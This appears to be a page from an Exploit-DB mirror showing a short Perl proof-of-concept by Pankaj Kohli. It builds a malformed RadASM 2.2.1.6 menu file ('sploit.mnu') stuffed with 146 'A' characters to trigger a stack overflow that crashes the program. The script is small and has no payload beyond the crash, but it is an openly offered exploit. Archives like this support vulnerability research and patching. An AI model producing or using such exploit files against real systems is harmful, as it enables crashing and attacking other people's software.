exploit-db-mirror/exploits/windows/dos/9361.pl
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

12 lines
No EOL
305 B
Perl
Executable file

# RadASM 2.2.1.6 Menu Editor (.mnu) file stack overlow PoC
# Coded by Pankaj Kohli
# http://www.pank4j.com
$str="A"x146;
$file="sploit.mnu";
open(my $FILE, ">>$file") or die "Error opening file.n";
print $FILE $str ;
close($FILE);
print "$file has been created.n";
# milw0rm.com [2009-08-04]